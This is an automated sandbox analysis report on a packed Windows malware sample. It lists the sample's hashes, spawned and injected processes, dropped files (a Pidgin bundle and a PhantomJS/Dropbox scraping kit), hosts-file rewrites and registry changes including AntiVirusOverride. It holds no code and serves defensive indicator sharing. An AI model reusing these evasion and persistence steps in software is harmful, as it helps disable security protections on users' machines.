MD5: 9f9a67c6638e9dfd444546f658cb0529
SHA1: 58d3f0ee5722ea8adee1933f892cdb7e4203efa8
SHA256: a9a664067c41ad88b63aff34d28beaa28cdeb668607de5d60e302c4d89e099a1
SSDeep: 12288:T7BNWXW2/Br4O0UhJy8WotreJLskbz6yXT26HuYZvpekyY1l6bG68Syg:T7BMXW2/GO065eJhWKT2GvQkyAYq6
Size: 810496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-04-16 00:18:31
Analyzed on: WindowsXP SP3 32-bit

Summary:

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

win32mrocli2.exe:428
%original file name%.exe:1256
purple.exe:2604
unzip.exe:2576
unzip.exe:6116
unovkkdak.exe:4740
unovkkdak.exe:3644
eityzygishyx.exe:564
eityzygishyx.exe:4936
glhljywourzj.exe:2816
glhljywapnzj.exe:4856
glhljywapnzj.exe:4708
glhljyvzcczjsznjntrz.exe:2508
glhljywpp4zj.exe:3992
glhljyw1jczj.exe:5872

The Malware injects its code into the following process(es):

phantomjs197.exe:1664

File activity

The process %original file name%.exe:1256 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\glhljyvzcczjsznjntrz.exe (3883 bytes)
%System%\mqyitew\tst (10 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\glhljyvzcczjsznjntrz.exe (0 bytes)

The process purple.exe:2604 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\dev\null\icons\24e5b564d56b4d1796b0dc4344959e47b69727e2.jpg.save (5 bytes)
C:\dev\null\icons\44fc67967f917b10ff19f38897c1bbd2d6ff2e35.jpg.save (5 bytes)
C:\dev\null\icons\583b4a20a047387492f6d590b5b9dde3f21c37fb.jpg.save (5 bytes)
C:\dev\null\icons\a8666123c3b28dcc219d1b77977b6b117925151b.jpg.save (5 bytes)
C:\dev\null\icons\38b72e51556edcd947566844b29968c385bfbc8b.jpg.save (5 bytes)
C:\dev\null\icons\245845f77a47c462b516fe16a04f4c2bca53f2af.jpg.save (5 bytes)
C:\dev\null\icons\b5e697d54a2a949708cb36ca28de44e15d94b77e.jpg.save (5 bytes)
C:\dev\null\icons\9235f133902a2e5a8c903257f30a33a9081eabc3.jpg.save (5 bytes)
C:\dev\null\icons\c11fa36622ea7c9801e8a7f1f8edbb090710860c.jpg.save (5 bytes)
C:\dev\null\icons\6f5c34656ae889d3a4be5752bac2ba158d914d30.jpg.save (5 bytes)
C:\dev\null\icons\d94f5c277f5a1bde18e7fb091adf4a691c0899e5.jpg.save (5 bytes)
C:\dev\null\icons\b688b8627d9ad1860fdd92f5b945854c0296c84e.jpg.save (5 bytes)
C:\dev\null\icons\666817ac7e958c3f00849b37a7331edb26e145ec.jpg.save (5 bytes)
C:\dev\null\icons\bd04b63ac46de0e663dbe85fde1c7e47ce3ff7f1.jpg.save (5 bytes)
C:\dev\null\icons\b76dbec37693329ba77eb18e79b39fb5fbf3054d.jpg.save (5 bytes)
C:\dev\null\icons\e6f6bbd5fafb7ff340f15ff6b3abc8caf850e315.jpg.save (5 bytes)
C:\dev\null\icons\d0c441ce203a51a3bae938018df3e5008a410d30.jpg.save (5 bytes)
C:\dev\null\icons\11e318a152e6529bbc35d7d9162e9c9aadad2ef0.jpg.save (5 bytes)
C:\dev\null\icons\3b76e70d5ed8690323495fb5524d677b5c609400.jpg.save (5 bytes)
C:\dev\null\icons\4553ab0ce0319aba787e20b0d556851615ccbb70.jpg.save (5 bytes)
C:\dev\null\icons\15e6a4765f6b8cce43698383bb17cfd498e02a0b.jpg.save (5 bytes)
C:\dev\null\icons\eaf0d8fd1743714599baf123924e6d3ac059156e.jpg.save (5 bytes)
C:\dev\null\icons\e341afabfc4d58e582d78a533eddb486d2f30ffc.jpg.save (5 bytes)
C:\dev\null\icons\8506be1381a997df1dc523e7b482ec01f38a4379.jpg.save (5 bytes)
C:\dev\null\icons\2c423a99e263dc28037c9fc1e8e84832ab2de9e3.jpg.save (5 bytes)
C:\dev\null\icons\5f210f8347bcd25e6f25ecc6247a7289a1d4f55c.jpg.save (5 bytes)
C:\dev\null\icons\25362109a4500f4c90538040e1231fcc629b3c8d.jpg.save (5 bytes)
C:\dev\null\icons\3da8e0656812f00e88ee3778e7770a849087c87b.jpg.save (5 bytes)
C:\dev\null\icons\2773de6db6f0bf389a1894aad4acf386d408f494.jpg.save (5 bytes)
C:\dev\null\icons\48b91aab153f9ffe7879a1cc6d89bbe6e083f7a0.jpg.save (5 bytes)
C:\dev\null\icons\913bc246c1791e69842270061dd6d042960dc94d.jpg.save (5 bytes)
C:\dev\null\icons\3784219f65e8d4e36cd26cde04e8821f423197e1.jpg.save (5 bytes)
C:\dev\null\icons\eaab6294c2c71677224bacb89dc712dcfaf5855e.jpg.save (5 bytes)
C:\dev\null\icons\301fc70c8fbd2a3017832c5c169bf2d324f3da7e.jpg.save (5 bytes)
C:\dev\null\icons\6d035cbf152f2f323826bc48cc9ed6edee5a5610.jpg.save (5 bytes)
C:\dev\null\icons\2d5f2725aeeb39d2b73fba914d1eaa5024119005.jpg.save (5 bytes)
C:\dev\null\icons\69a339461c86da40f494ed26abc1d12ff1f4fab5.jpg.save (5 bytes)
C:\dev\null\icons\63c0dab3c8b04b979ff8f4a9f29bd2286abc8c2c.jpg.save (5 bytes)
C:\dev\null\icons\277550b871fd84f39688ce0ae7e82f34d78f5db7.jpg.save (5 bytes)
C:\dev\null\icons\8aa806930ad4ca4a5ec3427c5796fbe91ee71f22.jpg.save (5 bytes)
C:\dev\null\icons\fec20686ac06dfd471656ea58f759f8ad50252b6.jpg.save (5 bytes)
C:\dev\null\icons\ca839c923b09a03377ccb1ff62af53ce474c9f76.jpg.save (5 bytes)
C:\dev\null\icons\152b17fd93e6588aae66c35eac8b90ceae152474.jpg.save (5 bytes)
C:\dev\null\icons\8a5ecd76a959529f6edfa0bc3d746f226de3cc1c.jpg.save (5 bytes)
C:\dev\null\icons\c626735a7764616e285ab8651240ddf7c227deff.jpg.save (5 bytes)
C:\dev\null\icons\d09c11dea18d4f26421157d9817b6a78333d421d.jpg.save (5 bytes)
C:\dev\null\icons\7a037474380e10e4114d34df27c7f719750f26b6.jpg.save (5 bytes)
C:\dev\null\icons\badeaad5b386acf782d712f79c2eaede1898fe8f.jpg.save (5 bytes)
C:\dev\null\icons\f92d9cd8314e6fd1ad6eac6baecb696abea59469.jpg.save (5 bytes)
C:\dev\null\icons\6c2add77cd1b32e41657342a1aa9c844bd68acd5.jpg.save (5 bytes)
C:\dev\null\accounts.xml.save (146 bytes)
C:\dev\null\icons\61bd633e8348cd7cda6332f0091b364fd1304228.jpg.save (5 bytes)
C:\dev\null\icons\41b3ad01aeabfff74efb3c00f8a6ef3c64d31f68.jpg.save (5 bytes)
C:\dev\null\icons\a51994902670d9aa461d0bcaf28104b8ff6d5f59.jpg.save (5 bytes)
C:\dev\null\icons\d5da8b1fd7bd631465419dbbce8358dfa2cb4abb.jpg.save (5 bytes)
C:\dev\null\icons\669ffde9f8d3aab3b99868ed8305d5251acf568b.jpg.save (5 bytes)
C:\dev\null\icons\59d0afc10817f666da61599f4ebae157b71b282a.jpg.save (5 bytes)
C:\dev\null\icons\6e8e61003aa3ea022af6aa587fa86776d3110c19.jpg.save (5 bytes)
C:\dev\null\icons\0629957ac0ac3c0984da13d12c9400ebdb01a4b2.jpg.save (5 bytes)
C:\dev\null\icons\23b81f9bc63ab275622657cd877dd9db2fbe451b.jpg.save (5 bytes)
C:\dev\null\icons\e27f4a709a4b91cd310cc12839c97b599d04443b.jpg.save (5 bytes)
C:\dev\null\icons\f0d7fdd2430fe14fe3b9936a81ecad86cc3b0d23.jpg.save (5 bytes)
C:\dev\null\icons\f2cc26fa05bcef7f833e02fde24fd44a5574e012.jpg.save (5 bytes)
C:\dev\null\status.xml.save (551 bytes)
C:\dev\null\icons\e6ba4580705b7614e6fc310ca2749c2c59557807.jpg.save (5 bytes)
C:\dev\null\icons\f95c1c6eb5593c9cb5589d267df1657a3d18cdc8.jpg.save (5 bytes)
C:\dev\null\icons\005fbc4b3cb146c8098badbc3e3c5c4516a2b2a0.jpg.save (5 bytes)
C:\dev\null\icons\3176e5c56e4007d4cec15d3e5ee7b3c05fc9d821.jpg.save (5 bytes)
C:\dev\null\icons\a797b30b4a519f36a19f4efcb662b555a42b77a9.jpg.save (5 bytes)
C:\dev\null\icons\1c197f09c6aa1ebc5f130a8cf5cc0721e8274160.jpg.save (5 bytes)
C:\dev\null\icons\7aaa0c3cef3bc52936bbf26f69d122a8531a4fdc.jpg.save (5 bytes)
C:\dev\null\icons\1d060cc267b0bdee1db9bf7e3b70db40fb2a1d1d.jpg.save (5 bytes)
C:\dev\null\icons\b85e74b2e16b150fc74c04bea72846d5ba861120.jpg.save (5 bytes)
C:\dev\null\icons\c51f62632c285d604506115f2488a8c529d86fff.jpg.save (5 bytes)
C:\dev\null\icons\d0043e0612cc62d10f3e56ff5605b97151fba2e2.jpg.save (5 bytes)
C:\dev\null\icons\c447baccbb86131f8b7f06455e5f784e7406875c.jpg.save (5 bytes)
C:\dev\null\icons\6f7a8a326b4d3ef245fab3019e730495bfa4b3ff.jpg.save (5 bytes)
C:\dev\null\icons\50ab434275cfb714e30f4ae6807d2d48e901f456.jpg.save (5 bytes)
C:\dev\null\icons\fcc65c34ab46530603387dc2b0cf203986424778.jpg.save (5 bytes)
C:\dev\null\icons\f86c0968b55852aff6fdb8134b83348477d205db.jpg.save (5 bytes)
C:\dev\null\icons\4806483986e60cad969a1707422a715d42f62161.jpg.save (5 bytes)
C:\dev\null\icons\e864caf001491035549485ec0ab163423e69da96.jpg.save (5 bytes)
C:\dev\null\icons\144ae9548d5b8c728a7d193cbad0e82270db5f59.jpg.save (5 bytes)
C:\dev\null\icons\73e1fa4cea1e684f9668a17985d5b3dab2447835.jpg.save (5 bytes)
C:\dev\null\icons\0aa6c2e449161c0e0f99b36cea819d0558926a91.jpg.save (5 bytes)
C:\dev\null\icons\b15a27be277dab59ec28552586bb2dd6ca6ccee7.jpg.save (5 bytes)
C:\dev\null\icons\e9adfad40f833f7762653ec212ec103c9f600f39.jpg.save (5 bytes)
C:\dev\null\icons\ab57c70dc1e997465b1a9b3211788914b7a19e96.jpg.save (5 bytes)
C:\dev\null\icons\c44004785c10a859dabfb2c9367cae0ffb703bf7.jpg.save (5 bytes)
C:\dev\null\icons\672f241bea6963a36dd5695b5fe3f4629376c0da.jpg.save (5 bytes)
C:\dev\null\icons\d6056b785ebc7f8b537ff356fd1ddcac0110bb1b.jpg.save (5 bytes)
C:\dev\null\icons\8c05df51218481539fe6057b6d3b389910492221.jpg.save (5 bytes)
C:\dev\null\icons\252a56b4ea1b746fcfee080190c17ea3427d84ab.jpg.save (5 bytes)
C:\dev\null\icons\485071ec7068eb6f1d0e5bea1128578b2c269adb.jpg.save (5 bytes)
C:\dev\null\icons\568310ec88a22903677e41668bf713d42201a7e3.jpg.save (5 bytes)
C:\dev\null\icons\bc44b5c3afd27ce45f8d3ff33a8ff00a67aa7be4.jpg.save (5 bytes)
C:\dev\null\icons\35c8f63338d1d8b3e105821ff6c073bc7e32c64b.jpg.save (5 bytes)
C:\dev\null\icons\bded82350b81a88f29535b3d2ff7f1d3174d0f62.jpg.save (5 bytes)
C:\dev\null\icons\6238f7b1beda6f61518a73109b44b1b4850cb076.jpg.save (5 bytes)
C:\dev\null\icons\4de41723633eaee5dbfdd3b81ab99d893ad5af5e.jpg.save (5 bytes)
C:\dev\null\icons\4c5abdf6fc4709a31250ed9282231dd73e53cb78.jpg.save (5 bytes)
C:\dev\null\icons\4c0acdeac39c421dfc981f9b5c3772ba7afef119.jpg.save (5 bytes)
C:\dev\null\certificates\x509\tls_peers\chat.facebook.com.save (5 bytes)
C:\dev\null\icons\1de34f64317b2abc9608e23df1dd6effb39a4d2d.jpg.save (5 bytes)
C:\dev\null\icons\b621750e66296ac0ea0dd7e7e50be53052cf1471.jpg.save (5 bytes)
C:\dev\null\icons\4fee2f853ee309b79a35c76650633a0ba58525b6.jpg.save (5 bytes)
C:\dev\null\icons\dab66afc9f14e3adb4b64533857fdd9c5d33cd0f.jpg.save (5 bytes)
C:\dev\null\icons\ac421f7a9c547c27c45627d1558c728621ab5df2.jpg.save (5 bytes)
C:\dev\null\icons\42fdc32270a1fd5a75143f4dd1556f2e96f74e7e.jpg.save (5 bytes)
C:\dev\null\icons\feb5bbd7f1ec2e48aa8bd9850279953f3cb8ff15.jpg.save (5 bytes)
C:\dev\null\icons\6b756679fda59cc6d3d320331e2e807e2e8034c4.jpg.save (5 bytes)
C:\dev\null\icons\2657185809fd100acc7077ef5ee905ed203b6bd2.jpg.save (5 bytes)
C:\dev\null\icons\b51bc5756e0f731155ee5826c634b66f611869be.jpg.save (5 bytes)
C:\dev\null\icons\d5da23a964bb94cdf1e0a47958c2e3e28274188a.jpg.save (5 bytes)
C:\dev\null\prefs.xml.save (7 bytes)
C:\dev\null\icons\3e63dcb89b4bc7d919bef1ef173908160712d926.jpg.save (5 bytes)
C:\dev\null\icons\0c9c6d01b7a9d095ccfcd1be369a914a09a4d6ca.jpg.save (5 bytes)
C:\dev\null\icons\71c42a9b04d4a6da914f77d0b0d6159dfc908582.jpg.save (5 bytes)
C:\dev\null\icons\a3d9268f0017c757b0fd28b53330fa36c49f2922.jpg.save (5 bytes)
C:\dev\null\icons\1d8a79b8deb9b1da5151f84490811142a3b33821.jpg.save (5 bytes)
C:\dev\null\icons\e72f15737758a50dc5b32ea4814411d9cf9c5454.jpg.save (5 bytes)
C:\dev\null\icons\f198472c67b151b158fb3dc895b69b66a9f72cdc.jpg.save (5 bytes)
C:\dev\null\icons\af79198bd964f03af2cf2dba4501d0750222d39c.jpg.save (5 bytes)
C:\dev\null\icons\3e017c5887de83134844c5987061bf0b59dd1fac.jpg.save (5 bytes)
C:\dev\null\icons\2bb6cad6d70c366fc0f207c411de48be190aafd3.jpg.save (5 bytes)
C:\dev\null\icons\bffa03620c634a5072f35a696bde7b15e1be170d.jpg.save (5 bytes)
C:\dev\null\icons\b1aa85b50bc38e97e673896a151287a5cc173d1d.jpg.save (5 bytes)
C:\dev\null\icons\7a367f364e432fea2fda687e66b21fe765938c9b.jpg.save (5 bytes)
C:\dev\null\icons\2662e11f4c739960de346f1b4a2ed159d5e2ab63.jpg.save (5 bytes)
C:\dev\null\icons\9e6c49c2ab23a89ea699f598a8c2539a2ce64c8c.jpg.save (5 bytes)
C:\dev\null\icons\3220b53edceccc88455498a6044922043fca8ad0.jpg.save (5 bytes)
C:\dev\null\icons\80105ce1d710b5e8db09b7979e2bdf81d129dd4a.jpg.save (5 bytes)
C:\dev\null\icons\395523545d38ccdf1bab7e03c8b5f3973c465f4d.jpg.save (5 bytes)
C:\dev\null\icons\fd5de0b5b5bc0c9db46898396c7c181cb5ed27dd.jpg.save (5 bytes)
C:\dev\null\icons\3c0120a98c4d6ae8d19fd4946c9addba294623a3.jpg.save (5 bytes)
C:\dev\null\icons\491ef8c5b8a22eeaa4a6c764f58a82b572063458.jpg.save (5 bytes)
C:\dev\null\icons\fda508ec035ed8be377a4e2d47d86c62d470c56d.jpg.save (5 bytes)
C:\dev\null\icons\ab0d22e02b11e53efe3533b906f55f612c933a64.jpg.save (5 bytes)
C:\dev\null\icons\31343e6619f34d02e94bef801548cf2a2e5058e4.jpg.save (5 bytes)
C:\dev\null\icons\1b58d9794274c7d75a1f0c8544ff7aa0e33256a0.jpg.save (5 bytes)
C:\dev\null\icons\2eaed5d088ced02f68e9e8db0755425b720c06a2.jpg.save (5 bytes)
C:\dev\null\icons\448dd396dac3de51a031b53270a89860afbe2508.jpg.save (5 bytes)
C:\dev\null\icons\70b8caba98bc624353433293dec0ca0d9dec5761.jpg.save (5 bytes)
C:\dev\null\icons\1ba35261202e2f87d9c312fbd792c55f662b8819.jpg.save (5 bytes)
C:\dev\null\icons\ebcb620b4604a59882f68714f2f32f11e42eeb5d.jpg.save (5 bytes)
C:\dev\null\icons\f75ecd3b906820a93d1cab5eddc3a89f7a2656b3.jpg.save (5 bytes)
C:\dev\null\icons\341afa921fc8402bd996cb690276976ed8acb5de.jpg.save (5 bytes)
C:\dev\null\icons\b98c1dcd1c8eb63e0557335f3ceb63d3e37e86a0.jpg.save (5 bytes)
C:\dev\null\icons\9f30caf38edc13cf99865a136b1d8a924983e9ab.jpg.save (5 bytes)
C:\dev\null\icons\92c02ea9a72036e3d437c6e1ea5e49ba0f467178.jpg.save (5 bytes)
C:\dev\null\icons\640c645551a704c54eff18836b7eae8ee0da0975.jpg.save (5 bytes)
C:\dev\null\icons\33ac15b05076bdc29117a7e7e072364626bcb7d5.jpg.save (5 bytes)
C:\dev\null\icons\dab069465fa334a7dbf839bc1b41e86e78ab97a0.jpg.save (5 bytes)
C:\dev\null\icons\4b870ba980703bb14fceb9f0970c66a97433060e.jpg.save (5 bytes)
C:\dev\null\icons\8b1a6971a8965fa993cbbe9f82a75322ccbdf3e7.jpg.save (5 bytes)
C:\dev\null\icons\18199163eecf1b7312ebcacd2ba8828cf04e2d27.jpg.save (5 bytes)
C:\dev\null\icons\2c8b0c86518a24fef9f6cf169713769d07fc4a47.jpg.save (5 bytes)
C:\dev\null\icons\d2b14958b1c462c9a453bd55d58413e1fa7506f8.jpg.save (5 bytes)
C:\dev\null\icons\8981eeb38add7f1fb59159d8cd14a69bfde94add.jpg.save (5 bytes)
C:\dev\null\icons\bdc26f85f6f911c631eb430af63385e92f7e63cc.jpg.save (5 bytes)
C:\dev\null\icons\17e83ae90356598435c2b10f836eb38d81c68b97.jpg.save (5 bytes)
C:\dev\null\icons\83a02ccc9667e6de04d506e1943699dae7038ffc.jpg.save (5 bytes)
C:\dev\null\icons\3d2e363d935d1dbb5dda889958207316d899bd2b.jpg.save (5 bytes)
C:\dev\null\icons\c6b99d22efe0c3d8b6975491077d1cf045aa35a2.jpg.save (5 bytes)
C:\dev\null\icons\2f26a8a25c51902edbe0b30f5ff669fd8ce47b6f.jpg.save (5 bytes)
C:\dev\null\icons\ef672920e507926187f15453894c8e65eb57a6e2.jpg.save (5 bytes)
C:\dev\null\icons\df706e4466ff63060bfe2817e250cb182458532c.jpg.save (5 bytes)
C:\dev\null\icons\06786df37768a4b1442258546b1cc8a25b9c1002.jpg.save (5 bytes)
C:\dev\null\icons\b060fb7221dbe24840e631a53de9c0c0b10b0307.jpg.save (5 bytes)
C:\dev\null\icons\1c697641b354de15eacffed0bd38c7287eb1da96.jpg.save (5 bytes)

The process unzip.exe:2576 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mqyitew\purple\nssutil3.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\AddTrust_External_Root.pem (1 bytes)
%System%\mqyitew\purple\libpurple.dll (5873 bytes)
%System%\mqyitew\purple\ssl3.dll (1281 bytes)
%System%\mqyitew\purple\intl.dll (601 bytes)
%System%\mqyitew\purple\purple.exe (26 bytes)
%System%\mqyitew\purple\libnspr4.dll (1281 bytes)
%System%\mqyitew\purple\smime3.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\Entrust.net_2048.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Verisign_Class3_Primary_CA.pem (834 bytes)
%System%\mqyitew\purple\ca-certs\Microsoft_Internet_Authority_2010.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\ValiCert_Class_2_VA.pem (1 bytes)
%System%\mqyitew\purple\plugins\xmppdisco.dll (44 bytes)
%System%\mqyitew\purple\sqlite3.dll (3073 bytes)
%System%\mqyitew\purple\plugins\libyahoo.dll (22 bytes)
%System%\mqyitew\purple\plugins\xmppconsole.dll (37 bytes)
%System%\mqyitew\purple\ca-certs\Entrust.net_Secure_Server_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Microsoft_Secure_Server_Authority_2010.pem (2 bytes)
%System%\mqyitew\purple\sasl2\saslGSSAPI.dll (36 bytes)
%System%\mqyitew\purple\libgobject-2.0-0.dll (2105 bytes)
%System%\mqyitew\purple\ca-certs\StartCom_Certification_Authority.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslPLAIN.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\AOL_Member_CA.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslCRAMMD5.dll (601 bytes)
%System%\mqyitew\purple\libssp-0.dll (36 bytes)
%System%\mqyitew\purple\ca-certs\DigiCertHighAssuranceEVRootCA.pem (1 bytes)
%System%\mqyitew\purple\libplds4.dll (14 bytes)
%System%\mqyitew\purple\ca-certs\Thawte_Primary_Root_CA.pem (1 bytes)
%System%\mqyitew\purple\libgmodule-2.0-0.dll (36 bytes)
%System%\mqyitew\purple\nss3.dll (5873 bytes)
%System%\mqyitew\purple\freebl3.dll (1425 bytes)
%System%\mqyitew\purple\ca-certs\Equifax_Secure_Global_eBusiness_CA-1.pem (964 bytes)
%System%\mqyitew\purple\libgcc_s_dw2-1.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\CAcert_Root.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5_2.pem (1 bytes)
%System%\mqyitew\purple\plugins\statenotify.dll (15 bytes)
%System%\mqyitew\purple\plugins\ssl-nss.dll (28 bytes)
%System%\mqyitew\purple\sasl2\saslDIGESTMD5.dll (673 bytes)
%System%\mqyitew\purple\libjabber.dll (2321 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class3_Extended_Validation_CA.pem (2 bytes)
%System%\mqyitew\purple\libplc4.dll (15 bytes)
%System%\mqyitew\purple\ca-certs\CAcert_Class3.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\Baltimore_CyberTrust_Root.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Thawte_Premium_Server_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\DigiCertHighAssuranceCA-3.pem (2 bytes)
%System%\mqyitew\purple\zlib1.dll (673 bytes)
%System%\mqyitew\purple\libglib-2.0-0.dll (7726 bytes)
%System%\mqyitew\purple\ca-certs\America_Online_Root_Certification_Authority_1.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Deutsche_Telekom_Root_CA_2.pem (1 bytes)
%System%\mqyitew\purple\plugins\ssl.dll (12 bytes)
%System%\mqyitew\purple\plugins\libxmpp.dll (21 bytes)
%System%\mqyitew\purple\libxml2-2.dll (7971 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G2.pem (1 bytes)
%System%\mqyitew\purple\libgthread-2.0-0.dll (44 bytes)
%System%\mqyitew\purple\softokn3.dll (673 bytes)
%System%\mqyitew\purple\ca-certs\Go_Daddy_Class_2_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_International_Server_Class_3_CA.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslLOGIN.dll (601 bytes)
%System%\mqyitew\purple\libsasl.dll (673 bytes)
%System%\mqyitew\purple\libymsg.dll (1281 bytes)
%System%\mqyitew\purple\ca-certs\Equifax_Secure_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\GTE_CyberTrust_Global_Root.pem (876 bytes)
%System%\mqyitew\purple\sasl2\saslANONYMOUS.dll (601 bytes)

The process unzip.exe:6116 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mqyitew\dropbox\package.json (767 bytes)
%System%\mqyitew\dropbox\googleTakeout.js (14 bytes)
%System%\mqyitew\dropbox\mouse.js (4 bytes)
%System%\mqyitew\dropbox\phantomjs197.exe (53130 bytes)
%System%\mqyitew\dropbox\querystring.js (5 bytes)
%System%\mqyitew\dropbox\casper.js (601 bytes)
%System%\mqyitew\dropbox\cli.js (5 bytes)
%System%\mqyitew\dropbox\pagestack.js (4 bytes)
%System%\mqyitew\dropbox\http.js (2 bytes)
%System%\mqyitew\dropbox\colorizer.js (4 bytes)
%System%\mqyitew\dropbox\bootstrap.js (14 bytes)
%System%\mqyitew\dropbox\events.js (8 bytes)
%System%\mqyitew\dropbox\tester.js (59 bytes)
%System%\mqyitew\dropbox\dropbox2.js (25 bytes)
%System%\mqyitew\dropbox\clientutils.js (35 bytes)
%System%\mqyitew\dropbox\utils.js (21 bytes)
%System%\mqyitew\dropbox\xunit.js (6 bytes)

The process unovkkdak.exe:4740 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mqyitew\tst (10 bytes)

The process unovkkdak.exe:3644 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Temp\glhljywourzj.exe (5873 bytes)
%System%\unzip.exe (7100 bytes)
%System%\win64mrocli2.exe (76437 bytes)
%System%\mqyitew\purple\purple.zip (90422 bytes)
%System%\mqyitew\rng (152 bytes)
%WinDir%\Temp\glhljywg9qzj.exe (1940 bytes)
%System%\win32mrocli2.exe (27367 bytes)
%System%\mqyitew\tst (10 bytes)
%System%\drivers\etc\hosts (904 bytes)
%System%\mqyitew\run (10 bytes)
%System%\mqyitew\por (1 bytes)
%System%\mqyitew\ihst (226 bytes)
%WinDir%\Temp\glhljywapnzj.exe (35 bytes)
%WinDir%\Temp\glhljywpp4zj.exe (35 bytes)
%System%\mqyitew\dropbox\dropbox.zip (181699 bytes)
%System%\mqyitew\purple\zip.exe (10500 bytes)
%System%\win64mroaes2.exe (76437 bytes)
%System%\eityzygishyx.exe (5873 bytes)
%System%\mqyitew\cfg (659 bytes)
%System%\mqyitew\purple\exefile (14580 bytes)
%WinDir%\Temp\glhljyw1jczj.exe (35 bytes)

The Malware deletes the following file(s):

%WinDir%\Temp\glhljywg9qzj.exe (0 bytes)
%WinDir%\Temp\glhljywpp4zj.exe (0 bytes)
%WinDir%\Temp\glhljywapnzj.exe (0 bytes)
%WinDir%\Temp\glhljywourzj.exe (0 bytes)
%WinDir%\Temp\glhljyw1jczj.exe (0 bytes)

The process eityzygishyx.exe:564 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mqyitew\tst (10 bytes)

The process eityzygishyx.exe:4936 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mqyitew\tst (10 bytes)

The process glhljywourzj.exe:2816 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mqyitew\tst (10 bytes)

The process glhljyvzcczjsznjntrz.exe:2508 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\unovkkdak.exe (5873 bytes)
%System%\mqyitew\etc (10 bytes)
%System%\mqyitew\tst (10 bytes)
%System%\drivers\etc\hosts (22 bytes)

The Malware deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

Registry activity

The process win32mrocli2.exe:428 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 42 C4 94 38 EB 38 31 4D 99 8C 2C 55 3D 01 4A"

The process purple.exe:2604 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 C8 88 3A 88 6E FB E9 30 08 9B B1 94 7C C2 28"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process phantomjs197.exe:1664 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 55 34 F3 51 25 81 05 D4 FA 59 B0 82 A0 F5 9C"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

The process unzip.exe:2576 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 53 A8 70 F7 D1 4A AC C5 BF 44 C5 34 E1 81 04"

The process unzip.exe:6116 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 FE D8 78 94 75 1C E4 41 01 0F 2D 60 8D E5 6C"

The process unovkkdak.exe:3644 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

